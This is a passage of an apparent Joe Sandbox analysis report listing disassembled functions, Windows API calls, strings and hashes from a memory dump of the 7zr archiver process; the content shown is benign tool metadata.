                          • Instruction Fuzzy Hash: C8217EB0910754DECB24DF6AD44865BFBF4FF60304F10895ED09697751DBB0AA18CB50
                          APIs
                          • __EH_prolog.LIBCMT ref: 001B46D4
                          • EnterCriticalSection.KERNEL32(00242918), ref: 001B46E8
                          • CompareFileTime.KERNEL32(?,?), ref: 001B4712
                          • LeaveCriticalSection.KERNEL32(00242918), ref: 001B476A
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: CriticalSection$CompareEnterFileH_prologLeaveTime
                          • String ID: v
                          • API String ID: 3800395459-3261393531
                          • Opcode ID: c429e1289054c4f48d27db8338dab1c994154f025b831a20c633738c41ffde18
                          • Instruction ID: c213d537a946dbf7563de44eef4dd1e9b95a024473273dacf0e4cbd7c3c34e80
                          • Opcode Fuzzy Hash: c429e1289054c4f48d27db8338dab1c994154f025b831a20c633738c41ffde18
                          • Instruction Fuzzy Hash: 3721CD71500601EFDB20CF68D488BEABBF5FF55344F208419E85A87612DB34FA49CB90
                          APIs
                          • __EH_prolog.LIBCMT ref: 001B4642
                          • EnterCriticalSection.KERNEL32(00242918), ref: 001B4656
                          • LeaveCriticalSection.KERNEL32(00242918), ref: 001B4685
                          • LeaveCriticalSection.KERNEL32(00242918), ref: 001B46C5
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: CriticalSection$Leave$EnterH_prolog
                          • String ID: v
                          • API String ID: 2532973370-3261393531
                          • Opcode ID: fe05d35a8fe8b5e1619e7f8191a2001bf4f8cfdb9d8ff3a118525c56bf1da71a
                          • Instruction ID: 584919d26c5357416f61c455d1b5beb009e8738e2ec906bd6bcdc383b1f522f2
                          • Opcode Fuzzy Hash: fe05d35a8fe8b5e1619e7f8191a2001bf4f8cfdb9d8ff3a118525c56bf1da71a
                          • Instruction Fuzzy Hash: 9D115A75B00611AFD724DF55D8889AEB7A9FF8A710B20822DE90ADB701D774ED058B90
                          APIs
                          • __EH_prolog.LIBCMT ref: 001B602A
                          • EnterCriticalSection.KERNEL32(00242938), ref: 001B6044
                          • LeaveCriticalSection.KERNEL32(00242938), ref: 001B6060
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterH_prologLeave
                          • String ID: v$8)$
                          • API String ID: 367238759-815355827
                          • Opcode ID: 700074557099a74da518ac331a6e51e890ade4e3e990b7d08fd1469d49ffb895
                          • Instruction ID: 1899d111bc0e0802ece0b64072a766805b791b67933e14387ef717c1ba63c809
                          • Opcode Fuzzy Hash: 700074557099a74da518ac331a6e51e890ade4e3e990b7d08fd1469d49ffb895
                          • Instruction Fuzzy Hash: BFF03A36A14114FFC705DF98E909ADEBBB8FF59354F24816AF405A7211C7B99A04CBA0
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: wcscmp$ExceptionH_prologThrow
                          • String ID:
                          • API String ID: 2750596395-0
                          • Opcode ID: c0565089c3019e58fb3559e2614b25a407a4dc23e6a5dc99f3fcd262b59db4e5
                          • Instruction ID: b4640ec58a27a5a5082ca681ed0e8b300467d0c9199797f2c47d1403c5866da8
                          • Opcode Fuzzy Hash: c0565089c3019e58fb3559e2614b25a407a4dc23e6a5dc99f3fcd262b59db4e5
                          • Instruction Fuzzy Hash: 3D91B931D0124AAFCF25EFE8D894AEDBBB5BF65314F148159E811A7292CB309B45CF90
                          APIs
                          • memset.MSVCRT ref: 001E03F5
                          • memcpy.MSVCRT(?,?,00000008,00000064,?,?,?,?,00000064), ref: 001E0490
                          • memset.MSVCRT ref: 001E0618
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: memset$memcpy
                          • String ID: $@
                          • API String ID: 368790112-1077428164
                          • Opcode ID: b087934bbc7c95f7ee7647cfdf8c5fba5a54d9d4edf4d7707c4dc34027eb37c2
                          • Instruction ID: 8edcfcddb34014cb5222cb4520a7e907a61faa71ffd814f1bb5357e4d108fb2d
                          • Opcode Fuzzy Hash: b087934bbc7c95f7ee7647cfdf8c5fba5a54d9d4edf4d7707c4dc34027eb37c2
                          • Instruction Fuzzy Hash: C091C530900B89AFDF22DF26C841BDEB7B1AF58304F048559E59A57192D7B0BAD9CF80
                          APIs
                            • Part of subcall function 00212FB0: EnterCriticalSection.KERNEL32(?,?,?,00212749), ref: 00212FB8
                            • Part of subcall function 00212FB0: LeaveCriticalSection.KERNEL32(?,?,?,00212749), ref: 00212FC2
                          • EnterCriticalSection.KERNEL32(?), ref: 0021290E
                          • LeaveCriticalSection.KERNEL32(?), ref: 00212928
                          • EnterCriticalSection.KERNEL32(?), ref: 00212992
                          • LeaveCriticalSection.KERNEL32(?), ref: 002129B8
                          • EnterCriticalSection.KERNEL32(?), ref: 00212A1E
                          • LeaveCriticalSection.KERNEL32(?), ref: 00212A56
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterLeave
                          • String ID: v
                          • API String ID: 3168844106-3261393531
                          • Opcode ID: a021f573dc1d2be92fbe887dd733938d14face07aaea09e509564675a13b6271
                          • Instruction ID: dacaa8666efd4b71b29662f20385e6ade3a922d804ddd143f134dcbeb4d94042
                          • Opcode Fuzzy Hash: a021f573dc1d2be92fbe887dd733938d14face07aaea09e509564675a13b6271
                          • Instruction Fuzzy Hash: 9C611774514706CFC720DF24C480BABB3E1BFA8354F21491DF9AA87250EB30E9A9CB51
                          APIs
                          • __EH_prolog.LIBCMT ref: 00186141
                            • Part of subcall function 00186C72: __EH_prolog.LIBCMT ref: 00186C77
                          • SetLastError.KERNEL32(0000010B,00000000,00000000), ref: 00186197
                          • GetLastError.KERNEL32(?,?,?,0000005C,?,00000000,00000000), ref: 0018626E
                          • SetLastError.KERNEL32(?,?,?,?,?,0000005C,?,00000000,00000000), ref: 001862A9
                            • Part of subcall function 00186096: __EH_prolog.LIBCMT ref: 0018609B
                            • Part of subcall function 00186096: DeleteFileW.KERNEL32(?,?,?,00000000), ref: 001860DF
                          • GetLastError.KERNEL32(?,?,?,0000005C,?,00000000,00000000), ref: 00186285
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ErrorLast$H_prolog$DeleteFile
                          • String ID:
                          • API String ID: 3586524497-0
                          • Opcode ID: 822b51b42047b1529ca30708cd05c6ea1cea16899522721a9e6deaca5001d56c
                          • Instruction ID: 4415c2e6f152a1bb1c1eb954012477544616027e6d3e88859e820daf23fa8be3
                          • Opcode Fuzzy Hash: 822b51b42047b1529ca30708cd05c6ea1cea16899522721a9e6deaca5001d56c
                          • Instruction Fuzzy Hash: 7E518B32C04228AADF16FBE4D896BEDBBB9BF25350F104099E85573192CB355B0ACF51
                          APIs
                          • memcmp.MSVCRT(?,002348A0,00000010), ref: 001944DB
                          • memcmp.MSVCRT(?,00230128,00000010), ref: 001944EE
                          • memcmp.MSVCRT(?,00230228,00000010), ref: 0019450B
                          • memcmp.MSVCRT(?,00230248,00000010), ref: 00194528
                          • memcmp.MSVCRT(?,002301C8,00000010), ref: 00194545
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: memcmp
                          • String ID:
                          • API String ID: 1475443563-0
                          • Opcode ID: 4379988401956fee4dfdefcf1c34dcf307b251a3dc39ace89cda7285c0cc08a1
                          • Instruction ID: 1b9ffc608f79991498830abf38cf7c83d8791a097c13ffbb1100d9fe5600b8f6
                          • Opcode Fuzzy Hash: 4379988401956fee4dfdefcf1c34dcf307b251a3dc39ace89cda7285c0cc08a1
                          • Instruction Fuzzy Hash: 8321B0B27502086BFB08CE609C81FBE73EC9B617A0F028129FD09DA241F764DD519AE0
                          APIs
                          • memcmp.MSVCRT(?,002348A0,00000010), ref: 001E672A
                          • memcmp.MSVCRT(?,00230258,00000010), ref: 001E6747
                          • memcmp.MSVCRT(?,002302D8,00000010), ref: 001E675A
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: memcmp
                          • String ID:
                          • API String ID: 1475443563-0
                          • Opcode ID: a38a735d041ed30430bc95734434753c6b8d271aeee27e45ab3d6c95b7e070c2
                          • Instruction ID: e83bd980d430fa6d75848780bb083948dc62aef463c0ca83506d95f8a1d38e7d
                          • Opcode Fuzzy Hash: a38a735d041ed30430bc95734434753c6b8d271aeee27e45ab3d6c95b7e070c2
                          • Instruction Fuzzy Hash: 2721D1B2A602086BE7088E11CC82FBF73E89B757E8F004129FD059A245F765DD6497E0
                          APIs
                          • memcmp.MSVCRT(?,002348A0,00000010), ref: 001A89D5
                          • memcmp.MSVCRT(?,00230258,00000010), ref: 001A89F2
                          • memcmp.MSVCRT(?,00230328,00000010), ref: 001A8A05
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: memcmp
                          • String ID:
                          • API String ID: 1475443563-0
                          • Opcode ID: facde1c4021612da993ef82c1fa27c3d681c5b1ccc0b402167fee3dd3471671a
                          • Instruction ID: 104d1c0a1f2fbc90a371e09b586461dd0b3110814d2d750fa0d75d74aaa8ed32
                          • Opcode Fuzzy Hash: facde1c4021612da993ef82c1fa27c3d681c5b1ccc0b402167fee3dd3471671a
                          • Instruction Fuzzy Hash: C22192B67502086BE7049A20CC82FBE73E89B62794F04412AFD46DB241FB75DD5097E1
                          APIs
                          • __EH_prolog.LIBCMT ref: 001EA8B9
                            • Part of subcall function 0018965D: VariantClear.OLEAUT32(?), ref: 0018967F
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ClearH_prologVariant
                          • String ID: ZIP$exe$zip
                          • API String ID: 1166855276-1635144978
                          • Opcode ID: becdd0730a4ed66acde5b4ee213d8b72bb812ef8ed295176f2753462cb897348
                          • Instruction ID: ae1a639194342622522e13bac984759aef89e58f22293619b40d2667dedae22f
                          • Opcode Fuzzy Hash: becdd0730a4ed66acde5b4ee213d8b72bb812ef8ed295176f2753462cb897348
                          • Instruction Fuzzy Hash: 0D61E531900685DFCF25EFA5C480AEEB7B5AF64304FA0442DE442A7292D7747B8ACB52
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: !$LZMA2:$LZMA:
                          • API String ID: 3519838083-3332058968
                          • Opcode ID: 4c53f17a92df8bdcd3a5c567d67eaa7aada66d897b2c9ca2171bc14dc5270ad0
                          • Instruction ID: f4bd086f5012d57565a1ef71d968f98ecd07913b2a4f3287f99da39945f0ac3e
                          • Opcode Fuzzy Hash: 4c53f17a92df8bdcd3a5c567d67eaa7aada66d897b2c9ca2171bc14dc5270ad0
                          • Instruction Fuzzy Hash: BF61C170A0414AAEDB19DB64C659FFD7BB1AF35344F1940ADE40E67262DB70EE80CB80
                          APIs
                          • __EH_prolog.LIBCMT ref: 00192AAE
                          • _CxxThrowException.MSVCRT(?,00236010), ref: 00192BC1
                          • _CxxThrowException.MSVCRT(?,00236010), ref: 00192BDF
                            • Part of subcall function 00192BF5: __EH_prolog.LIBCMT ref: 00192BFA
                            • Part of subcall function 00192BF5: _CxxThrowException.MSVCRT(?,00236010), ref: 00192C9E
                          Strings
                          • There is no second file name for rename pair:, xrefs: 00192BAE
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ExceptionThrow$H_prolog
                          • String ID: There is no second file name for rename pair:
                          • API String ID: 206451386-3412818124
                          • Opcode ID: b19414e101184791a20f2da23f2c7a1813b6f80f6c3df4c5b10b03248706f70b
                          • Instruction ID: dfb6b1f4cfcba7f5cd32ad60e6d50408eef1a7d09627701eb482e3afdbb6c2b1
                          • Opcode Fuzzy Hash: b19414e101184791a20f2da23f2c7a1813b6f80f6c3df4c5b10b03248706f70b
                          • Instruction Fuzzy Hash: 9341CF31A00109FBCF15EF94C891BEEBBB1BF69314F208119E8166B2D2C770AE55CB91
                          APIs
                          • __EH_prolog.LIBCMT ref: 001A6B88
                            • Part of subcall function 001C04D2: _CxxThrowException.MSVCRT(?,00234A58), ref: 001C04F8
                            • Part of subcall function 00181524: __EH_prolog.LIBCMT ref: 00181529
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                            • Part of subcall function 00183599: memmove.MSVCRT(00000002,?,?,?,00000001,?,0018904C,00000001,00000002,00000000,00000000,?,?,?,00188EC4,?), ref: 001835D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog$ExceptionThrowfreememmove
                          • String ID: crc$flags$memuse
                          • API String ID: 2665131394-339511674
                          • Opcode ID: 1fc252e838013501ecad32078497f0154bfd1d498ad3c499353541da47aad34a
                          • Instruction ID: 46d7ee3016f7a27c553f14932fa4bfee7184cb9792e6130bf1841fcacb9d73e5
                          • Opcode Fuzzy Hash: 1fc252e838013501ecad32078497f0154bfd1d498ad3c499353541da47aad34a
                          • Instruction Fuzzy Hash: AE31C335900119EACF16FBD0C952BED77B5EF26324F144058E94137192CB769F49CBA0
                          APIs
                          • __EH_prolog.LIBCMT ref: 0018A389
                            • Part of subcall function 0018A4C5: GetModuleHandleW.KERNEL32(ntdll.dll,?,0018A3C1,00000001), ref: 0018A4CD
                            • Part of subcall function 0018A4C5: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0018A4DD
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: AddressH_prologHandleModuleProc
                          • String ID: : $ SP:$Windows
                          • API String ID: 786088110-3655538264
                          • Opcode ID: 4c2bf52aa767bd9f7f7457e9ec95d09e7177efb1b327da2e0422d2403f587c22
                          • Instruction ID: 17fffa7b16d78f21e6db4a839f99461ac5ec010b10ecc77b80787e853ce31dd4
                          • Opcode Fuzzy Hash: 4c2bf52aa767bd9f7f7457e9ec95d09e7177efb1b327da2e0422d2403f587c22
                          • Instruction Fuzzy Hash: AF31EB31D001199BDF16FBA4C8969EEBBB5FF29300F50406AE50672191EF715B85CFA1
                          APIs
                          • __EH_prolog.LIBCMT ref: 001907E0
                          • EnterCriticalSection.KERNEL32(?), ref: 001907F2
                          • LeaveCriticalSection.KERNEL32(?), ref: 0019086B
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterH_prologLeave
                          • String ID: v
                          • API String ID: 367238759-3261393531
                          • Opcode ID: 98aa2b4cbef002e7472af1b295030974b079352727872a81ce094776338f71a5
                          • Instruction ID: 9fc962c5548ed065ed0d705aecfcdca9bf045d077f78108095d697cee84cfb94
                          • Opcode Fuzzy Hash: 98aa2b4cbef002e7472af1b295030974b079352727872a81ce094776338f71a5
                          • Instruction Fuzzy Hash: CA215935A00214DFDB24CF69C58495ABBF5FF88714B15866ED84A8B321C730ED05CB90
                          APIs
                          • __EH_prolog.LIBCMT ref: 00192BFA
                            • Part of subcall function 00193AF1: __EH_prolog.LIBCMT ref: 00193AF6
                          • _CxxThrowException.MSVCRT(?,00236010), ref: 00192C9E
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog$ExceptionThrow
                          • String ID: -r0$Unsupported rename command:
                          • API String ID: 2366012087-1002762148
                          • Opcode ID: c123d654ca1c5d2524c5963d1a999e00d3df691ea688984d6ca7accf886947d3
                          • Instruction ID: 377640b9d65716e7ca445dd7db6514a3ea8f53a12be6dd5e00542ab9c4d95f32
                          • Opcode Fuzzy Hash: c123d654ca1c5d2524c5963d1a999e00d3df691ea688984d6ca7accf886947d3
                          • Instruction Fuzzy Hash: 12118635500205AACF15FBA0D992DFEB7B8AF75B50F044419F91263182DB719B56CBA0
                          APIs
                          • __EH_prolog.LIBCMT ref: 001906FB
                          • EnterCriticalSection.KERNEL32(?), ref: 0019070B
                          • LeaveCriticalSection.KERNEL32(?,?), ref: 00190786
                            • Part of subcall function 0019089E: _CxxThrowException.MSVCRT(?,00234A58), ref: 001908C4
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterExceptionH_prologLeaveThrow
                          • String ID: v
                          • API String ID: 4150843469-3261393531
                          • Opcode ID: 9e22f8faa07f5349557d4e359a2cf695b436f4871cf70d9c5b5edc300ae2141b
                          • Instruction ID: aba9f6f049711084d7a9aee1a576fa008694f9b33549d59ca9a82c0af9ec6c26
                          • Opcode Fuzzy Hash: 9e22f8faa07f5349557d4e359a2cf695b436f4871cf70d9c5b5edc300ae2141b
                          • Instruction Fuzzy Hash: 512159B1A10604EFCB25DF68D584BAABBF0FF08314F10892EE45ACBA42D735A915CF40
                          APIs
                          • GetModuleHandleW.KERNEL32(ntdll.dll,?,0018A3C1,00000001), ref: 0018A4CD
                          • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0018A4DD
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: RtlGetVersion$ntdll.dll
                          • API String ID: 1646373207-1489217083
                          • Opcode ID: b4d613d8b4c83a36c470bb1a973d2b8f8c50d5530f6f1573f41caf1a41e14295
                          • Instruction ID: 894ad50d5ee4526b18df6c470bd015a6e58af3d0aca46e803fbb43b0b0dd1793
                          • Opcode Fuzzy Hash: b4d613d8b4c83a36c470bb1a973d2b8f8c50d5530f6f1573f41caf1a41e14295
                          • Instruction Fuzzy Hash: ADD09E713682203ABA7066F47C0FBAA16489F41A617654456B904D1154E6D4DAA345A1
                          APIs
                          • GetModuleHandleW.KERNEL32(kernel32.dll,GetLargePageMinimum,00191D26), ref: 00206A6A
                          • GetProcAddress.KERNEL32(00000000), ref: 00206A71
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
